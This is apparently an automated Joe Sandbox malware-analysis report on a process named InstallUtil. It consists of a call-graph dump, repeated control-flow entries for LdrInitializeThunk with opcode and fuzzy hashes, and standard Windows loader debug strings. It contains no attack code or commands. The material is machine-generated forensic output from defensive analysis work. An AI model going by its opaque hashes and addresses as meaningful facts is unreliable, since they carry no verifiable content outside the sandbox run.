18180->18147 18181->18180 18199 138c43e 18181->18199 18188 138d15d 18183->18188 18184 138d29e 18217 138d38e 18184->18217 18186 138d2ac 18192 138d2c1 18186->18192 18222 138dbd2 18186->18222 18188->18184 18190 138d2d8 18188->18190 18188->18192 18205 138d616 18188->18205 18193 138d38e 15 API calls 18190->18193 18191 138d31c 18195 138d330 18191->18195 18237 138c52d 18191->18237 18192->18191 18231 138c7a2 18192->18231 18196 138d2e8 18193->18196 18195->18148 18196->18192 18198 138dbd2 262 API calls 18196->18198 18198->18192 18200 138c46c 18199->18200 18204 138c4bf _vswprintf_s 18199->18204 18203 138c490 RtlDebugPrintTimes 18200->18203 18200->18204 18201 130b640 _vswprintf_s 12 API calls 18202 138c529 18201->18202 18202->18180 18203->18204 18204->18201 18206 138d651 18205->18206 18207 138d733 RtlDebugPrintTimes 18206->18207 18210 138d751 18206->18210 18207->18210 18208 138d757 18209 130b640 _vswprintf_s 12 API calls 18208->18209 18213 138d85e 18209->18213 18210->18208 18211 138d7ca 18210->18211 18212 138d7b1 RtlDebugPrintTimes 18210->18212 18214 138d7ce 18211->18214 18241 138def6 18211->18241 18212->18211 18213->18188 18214->18208 18216 138d81f RtlDebugPrintTimes 18214->18216 18216->18208 18259 12c774a 18217->18259 18219 138d3d2 18221 138d419 18219->18221 18264 138d466 18219->18264 18221->18186 18224 138dc12 18222->18224 18227 138dd1f 18222->18227 18223 138dcca 18223->18192 18224->18223 18225 138dcb2 18224->18225 18228 138dcd1 18224->18228 18226 138a80d 28 API calls 18225->18226 18226->18223 18227->18223 18229 138c52d 262 API calls 18227->18229 18228->18227 18270 138d8df 18228->18270 18229->18223 18232 138c7c6 _vswprintf_s 18231->18232 18233 138c863 18232->18233 18278 138c59e RtlDebugPrintTimes 18232->18278 18234 130b640 _vswprintf_s 12 API calls 18233->18234 18235 138c87f 18234->18235 18235->18191 18240 138c548 18237->18240 18238 138c595 18238->18195 18240->18238 18282 138db14 18240->18282 18242 138dfe8 18241->18242 18245 138a6b3 18242->18245 18250 12f1164 18245->18250 
18248 12f1164 14 API calls 18249 138a6d7 18248->18249 18249->18214 18251 1335490 18250->18251 18255 12f117f 18250->18255 18253 1309670 _vswprintf_s LdrInitializeThunk 18251->18253 18253->18255 18256 12f5720 18255->18256 18257 12f4e70 14 API calls 18256->18257 18258 12f1185 18257->18258 18258->18248 18260 12c777a 18259->18260 18261 13228d8 18259->18261 18260->18219 18262 12f1164 14 API calls 18261->18262 18263 13228dd 18262->18263 18265 138d4bc 18264->18265 18266 138d4cc RtlDebugPrintTimes 18265->18266 18267 138d4c6 18265->18267 18266->18267 18268 130b640 _vswprintf_s 12 API calls 18267->18268 18269 138d591 18268->18269 18269->18221 18275 138d917 18270->18275 18271 130b640 _vswprintf_s 12 API calls 18272 138da95 18271->18272 18272->18227 18273 138d96d 18274 138da54 18273->18274 18276 138d9ed RtlDebugPrintTimes 18273->18276 18274->18271 18275->18273 18275->18274 18277 136da47 259 API calls 18275->18277 18276->18273 18277->18273 18279 138c5cb 18278->18279 18280 130b640 _vswprintf_s 12 API calls 18279->18280 18281 138c5f9 18280->18281 18281->18233 18283 138dbae 18282->18283 18289 138db4f 18282->18289 18290 138c95a 18283->18290 18285 138dbac 18286 130b640 _vswprintf_s 12 API calls 18285->18286 18288 138dbcc 18286->18288 18287 138db90 RtlDebugPrintTimes 18287->18285 18288->18238 18289->18287 18291 138c9e8 18290->18291 18293 138c99f 18290->18293 18292 138d8df 260 API calls 18291->18292 18295 138c9e4 18292->18295 18294 138c9c6 RtlDebugPrintTimes 18293->18294 18294->18295 18296 130b640 _vswprintf_s 12 API calls 18295->18296 18297 138ca15 18296->18297 18297->18285 18299 139318c 18298->18299 18300 1393169 RtlDebugPrintTimes 18299->18300 18301 13931d4 RtlDebugPrintTimes 18299->18301 18302 139319a 18299->18302 18300->18299 18301->18302 18303 13931a0 RtlDebugPrintTimes 18302->18303 18306 13931bf 18302->18306 18303->18306 18304 130b640 _vswprintf_s 12 API calls 18305 13931ce 18304->18305 18305->18156 18306->18304 18308 1392603 18307->18308 18311 13927a5 18308->18311 18313 1392fbd 
18308->18313 18309 139286b 18309->18157 18311->18309 18320 139241a 18311->18320 18314 1392fe4 18313->18314 18315 13930a2 RtlDebugPrintTimes 18314->18315 18316 1393074 RtlDebugPrintTimes 18314->18316 18317 1393089 18315->18317 18316->18317 18318 130b640 _vswprintf_s 12 API calls 18317->18318 18319 13930f0 18318->18319 18319->18311 18323 139242f 18320->18323 18322 139246c 18322->18309 18323->18322 18324 13922ae 18323->18324 18325 13922dd 18324->18325 18326 1392fbd 14 API calls 18325->18326 18327 13923ee 18325->18327 18326->18327 18327->18323 18333 139e669 _vswprintf_s 18328->18333 18329 139e66f 18330 130b640 _vswprintf_s 12 API calls 18329->18330 18331 139e725 18330->18331 18331->17555 18332 139e704 18332->18329 18334 139e5b6 14 API calls 18332->18334 18333->18329 18333->18332 18343 139e824 18333->18343 18334->18329 18337 139e608 RtlDebugPrintTimes 18336->18337 18338 139e5e1 18336->18338 18339 139e619 18337->18339 18338->18337 18355 139ed52 18338->18355 18340 130b640 _vswprintf_s 12 API calls 18339->18340 18342 139e626 18340->18342 18342->17552 18344 139e853 18343->18344 18345 139e9fb RtlDebugPrintTimes 18344->18345 18346 139e9d6 18344->18346 18352 139ea18 _vswprintf_s 18345->18352 18347 130b640 _vswprintf_s 12 API calls 18346->18347 18348 139ed3b 18347->18348 18348->18333 18349 139eb19 18349->18346 18350 139ed1b RtlDebugPrintTimes 18349->18350 18350->18346 18351 139eb7a RtlDebugPrintTimes 18354 139eb90 18351->18354 18352->18346 18352->18349 18352->18351 18353 139ec9d RtlDebugPrintTimes 18353->18349 18354->18349 18354->18353 18359 139ed73 18355->18359 18356 139ee58 18357 130b640 _vswprintf_s 12 API calls 18356->18357 18358 139ee6d 18357->18358 18358->18338 18359->18356 18360 139ee47 RtlDebugPrintTimes 18359->18360 18360->18356 18362 138bbbb 298 API calls 18361->18362 18363 138016d 18362->18363 18363->17563 18364 1380180 18363->18364 18365 138bcd2 279 API calls 18364->18365 18366 1380199 18365->18366 18366->17563 18368 138ae6a 18367->18368 18371 138af27 18368->18371 
18372 138af3d 18368->18372 18376 138af38 18368->18376 18369 138af6c 18385 138ea55 18369->18385 18370 138afc3 18407 138fde2 18370->18407 18375 138a80d 28 API calls 18371->18375 18372->18369 18372->18370 18375->18376 18376->17526 18378 12e7d50 GetPEB 18379 138af85 18378->18379 18380 138af99 18379->18380 18381 138af89 GetPEB 18379->18381 18380->18376 18382 138afa3 GetPEB 18380->18382 18381->18380 18382->18376 18383 138afb2 18382->18383 18383->18376 18400 1381608 18383->18400 18386 138ea74 18385->18386 18387 138ea8d 18386->18387 18390 138eab0 18386->18390 18388 138a80d 28 API calls 18387->18388 18389 138af7a 18388->18389 18389->18378 18391 138afde 34 API calls 18390->18391 18392 138eb12 18391->18392 18393 138bcd2 278 API calls 18392->18393 18394 138eb3d 18393->18394 18395 12e7d50 GetPEB 18394->18395 18396 138eb48 18395->18396 18397 138eb4c GetPEB 18396->18397 18398 138eb60 18396->18398 18397->18398 18398->18389 18399 137fe3f 14 API calls 18398->18399 18399->18389 18401 12e7d50 GetPEB 18400->18401 18402 1381634 18401->18402 18403 1381638 GetPEB 18402->18403 18404 1381648 _vswprintf_s 18402->18404 18403->18404 18405 130b640 _vswprintf_s 12 API calls 18404->18405 18406 138166b 18405->18406 18406->18376 18408 138fdf5 18407->18408 18409 138fdfe 18408->18409 18410 138fe12 18408->18410 18411 138a80d 28 API calls 18409->18411 18412 138fe2c 18410->18412 18413 138febd 18410->18413 18420 138fe0d 18411->18420 18414 138fe45 18412->18414 18415 138fe35 18412->18415 18416 1390a13 264 API calls 18413->18416 18436 1392b28 18414->18436 18417 138dbd2 262 API calls 18415->18417 18419 138fecb 18416->18419 18421 138fe41 18417->18421 18423 12e7d50 GetPEB 18419->18423 18420->18376 18427 12e7d50 GetPEB 18421->18427 18422 138fe55 18422->18421 18428 138c8f7 13 API calls 18422->18428 18424 138fed3 18423->18424 18425 138fee7 18424->18425 18426 138fed7 GetPEB 18424->18426 18425->18420 18430 138fef1 GetPEB 18425->18430 18426->18425 18429 138fe77 18427->18429 18428->18421 18431 138fe8b 18429->18431 

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 14 1309910-130991c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: ab45ba730c31f6730565f6361b3b5bc5a15cc66223aa17b94cc4d591747a1440
                      • Instruction ID: 4935cff62c0d82f4e51dbd3bce572dc85b56fb538f9ac060f89cef0604d00e2e
                      • Opcode Fuzzy Hash: ab45ba730c31f6730565f6361b3b5bc5a15cc66223aa17b94cc4d591747a1440
                      • Instruction Fuzzy Hash: B59002B520101402D544719944087460405A7D1345F51C421A5054554EC6998DE976A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 15 13099a0-13099ac LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 8e238b7b305a7d27610656a67559fc5053596cb7487b0d723fa28590ac2d97a7
                      • Instruction ID: c9471c65e6e8de01020d064b801053794dc4009ec935e558bd2104258e15336a
                      • Opcode Fuzzy Hash: 8e238b7b305a7d27610656a67559fc5053596cb7487b0d723fa28590ac2d97a7
                      • Instruction Fuzzy Hash: B09002A534101442D50461994418B060405E7E2345F51C425E1054554DC659CC667166
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 12 1309860-130986c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9e8cd7e671dada42f699ebf01746dac9fce5b2867d479b45a68595a1e9d00b6e
                      • Instruction ID: ecf3e0788161dce5c1d54887323297376642b264a466029f50d11e28135d75bd
                      • Opcode Fuzzy Hash: 9e8cd7e671dada42f699ebf01746dac9fce5b2867d479b45a68595a1e9d00b6e
                      • Instruction Fuzzy Hash: D690027520101413D515619945087070409A7D1385F91C822A0414558DD6968966B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 11 1309840-130984c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: b43e966779c4978ef7e6a3097ccf941a5adaf7749c10b162a7de40974ca04ff8
                      • Instruction ID: da4f58e1cb56ed39cfb257d3e26916432b76b5695d0d00ae007912033f8ef272
                      • Opcode Fuzzy Hash: b43e966779c4978ef7e6a3097ccf941a5adaf7749c10b162a7de40974ca04ff8
                      • Instruction Fuzzy Hash: B9900265242051529949B19944085074406B7E1385791C422A1404950CC566986AE661
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 13 13098f0-13098fc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: bb265aeaac6c69a3be3d43aee3b85a3b96c9560c42e539d8015657b00b813be2
                      • Instruction ID: 770f924125ce15a41c92fffb5d3af0c94e85fd906fd83fc06f68f4384783e142
                      • Opcode Fuzzy Hash: bb265aeaac6c69a3be3d43aee3b85a3b96c9560c42e539d8015657b00b813be2
                      • Instruction Fuzzy Hash: 0790026560101502D50571994408616040AA7D1385F91C432A1014555ECA6589A6B171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 17 1309a20-1309a2c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: bb92479ac3519fcc902f1095b50a700f16586d8eb5fa863f727639a93febff98
                      • Instruction ID: f7fbc8b2e56b04014338f5246fd7812deed6cf5b1d3d680267d15a836d4f61ad
                      • Opcode Fuzzy Hash: bb92479ac3519fcc902f1095b50a700f16586d8eb5fa863f727639a93febff98
                      • Instruction Fuzzy Hash: 9B90026560101042854471A988489064405BBE2355751C531A0988550DC599887966A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 16 1309a00-1309a0c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 27cca0cdf5b2e5f71c3452811acad3e94db56f8f641ed07cdc9c13a8f81d275c
                      • Instruction ID: 10d58bfe2a335f36574a22a6bf7f1ed556a5bb44e3a020be838e1c251337b78a
                      • Opcode Fuzzy Hash: 27cca0cdf5b2e5f71c3452811acad3e94db56f8f641ed07cdc9c13a8f81d275c
                      • Instruction Fuzzy Hash: 7C90027520141402D5046199481870B0405A7D1346F51C421A1154555DC665886575B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 108b334eda297416109b666c3af08ed069c1af36a79b0e3160c27d5bd35484f7
                      • Instruction ID: 640d80eab98b7a5b4424fdae78683efac084a6d2020a9ad3ea913f4d5d49ded2
                      • Opcode Fuzzy Hash: 108b334eda297416109b666c3af08ed069c1af36a79b0e3160c27d5bd35484f7
                      • Instruction Fuzzy Hash: 7590026521181042D60465A94C18B070405A7D1347F51C525A0144554CC95588756561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 4 1309540-130954c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 1268d9a620011ef2b6355f517d64872cfec363137e1fc995458878ec4bfab17e
                      • Instruction ID: d2ff1311c5012e7e5124ed1e515783ed012ebbb8b9c0029d0c961e5b377699c6
                      • Opcode Fuzzy Hash: 1268d9a620011ef2b6355f517d64872cfec363137e1fc995458878ec4bfab17e
                      • Instruction Fuzzy Hash: C2900269211010034509A59907085070446A7D6395351C431F1005550CD66188756161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5 13095d0-13095dc LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4aed993f579bbef05ae86ac073da23a825a2158fb813128a00732a68537d4d8b
                      • Instruction ID: 5ced99b8795b7791aa4775b72501d7ed1f61858d68bc2f6bd04966312a08aa84
                      • Opcode Fuzzy Hash: 4aed993f579bbef05ae86ac073da23a825a2158fb813128a00732a68537d4d8b
                      • Instruction Fuzzy Hash: 119002A520201003850971994418616440AA7E1345B51C431E1004590DC56588A57165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 8 1309710-130971c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 781efb220e11c4440a0dbbf00eb5cc57ec73f8872ed9625f1c96c8ce856f8a76
                      • Instruction ID: 50783b5418e46876434d1b56449dfbbf83d5b8a342ae0e0bb01ff8fb360e0f01
                      • Opcode Fuzzy Hash: 781efb220e11c4440a0dbbf00eb5cc57ec73f8872ed9625f1c96c8ce856f8a76
                      • Instruction Fuzzy Hash: 1890027520101402D50465D9540C6460405A7E1345F51D421A5014555EC6A588A57171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 10 13097a0-13097ac LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: d82197ad8ddcef329342bcc0e2c2d88023282c850eb06103ae29ca16ea3835fc
                      • Instruction ID: 609e1568ce0a2cedff4256c9c1cb17e40a344e1b1a881603840df8ef429e3a8a
                      • Opcode Fuzzy Hash: d82197ad8ddcef329342bcc0e2c2d88023282c850eb06103ae29ca16ea3835fc
                      • Instruction Fuzzy Hash: 0E90026530101003D5447199541C6064405F7E2345F51D421E0404554CD955886A6262
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 9 1309780-130978c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 0a1ff2301e0154ab56922d3c15fa419b2785f8c8ad48b408f5603a8903aa3735
                      • Instruction ID: 0f8db3cdaecb84cda6a2991bb57641b8617a19b83743b9fc5247ddf976638637
                      • Opcode Fuzzy Hash: 0a1ff2301e0154ab56922d3c15fa419b2785f8c8ad48b408f5603a8903aa3735
                      • Instruction Fuzzy Hash: 4490026D21301002D5847199540C60A0405A7D2346F91D825A0005558CC955887D6361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 6 1309660-130966c LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 3809fa3a08659f36797bad978c2bdc5a5b3feefc11f922c2f9af2199c50c57ce
                      • Instruction ID: f1aaae4b251fd128faa08e02ddf29b3756141bda1435a690caa38b0067dff4d2
                      • Opcode Fuzzy Hash: 3809fa3a08659f36797bad978c2bdc5a5b3feefc11f922c2f9af2199c50c57ce
                      • Instruction Fuzzy Hash: 3A90027520101802D5847199440864A0405A7D2345F91C425A0015654DCA558A6D77E1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 7 13096e0-13096ec LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2d71ec65ce84dca68444f1c874d65a96381d7642b89c0b117ba5dade106ae539
                      • Instruction ID: 1969cbcc8e18bb81fb26a6ad11b84510f144fe977bdf5a56f09e86b686002dee
                      • Opcode Fuzzy Hash: 2d71ec65ce84dca68444f1c874d65a96381d7642b89c0b117ba5dade106ae539
                      • Instruction Fuzzy Hash: 8490027520109802D5146199840874A0405A7D1345F55C821A4414658DC6D588A57161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 130967a-130967f 1 1309681-1309688 0->1 2 130968f-1309696 LdrInitializeThunk 0->2
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 87bc257be6869c6e75247f8f71785c2d832cf8b870735d2748443ebee3dc4fe8
                      • Instruction ID: 03f95bed409d2391035d7022dfed3e44ee075b89d0461e7556e859117b60b546
                      • Opcode Fuzzy Hash: 87bc257be6869c6e75247f8f71785c2d832cf8b870735d2748443ebee3dc4fe8
                      • Instruction Fuzzy Hash: ABB02B718010C4C6DA02D3A00A0C7173D0077C0318F12C061D1020240F8338C090F2B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 0000000E.00000002.470291183.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_41f000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e2059d30526379246035844a62210ccccf078bb989da545bc7f174f0b00cc021
                      • Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
                      • Opcode Fuzzy Hash: e2059d30526379246035844a62210ccccf078bb989da545bc7f174f0b00cc021
                      • Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0137B305
                      • *** Inpage error in %ws:%s, xrefs: 0137B418
                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0137B53F
                      • The resource is owned shared by %d threads, xrefs: 0137B37E
                      • *** An Access Violation occurred in %ws:%s, xrefs: 0137B48F
                      • *** enter .cxr %p for the context, xrefs: 0137B50D
                      • *** then kb to get the faulting stack, xrefs: 0137B51C
                      • a NULL pointer, xrefs: 0137B4E0
                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0137B323
                      • The resource is owned exclusively by thread %p, xrefs: 0137B374
                      • write to, xrefs: 0137B4A6
                      • Go determine why that thread has not released the critical section., xrefs: 0137B3C5
                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0137B2F3
                      • The instruction at %p referenced memory at %p., xrefs: 0137B432
                      • an invalid address, %p, xrefs: 0137B4CF
                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0137B352
                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0137B314
                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0137B476
                      • This failed because of error %Ix., xrefs: 0137B446
                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0137B38F
                      • *** enter .exr %p for the exception record, xrefs: 0137B4F1
                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0137B39B
                      • The critical section is owned by thread %p., xrefs: 0137B3B9
                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0137B2DC
                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0137B47D
                      • The instruction at %p tried to %s , xrefs: 0137B4B6
                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0137B484
                      • <unknown>, xrefs: 0137B27E, 0137B2D1, 0137B350, 0137B399, 0137B417, 0137B48E
                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0137B3D6
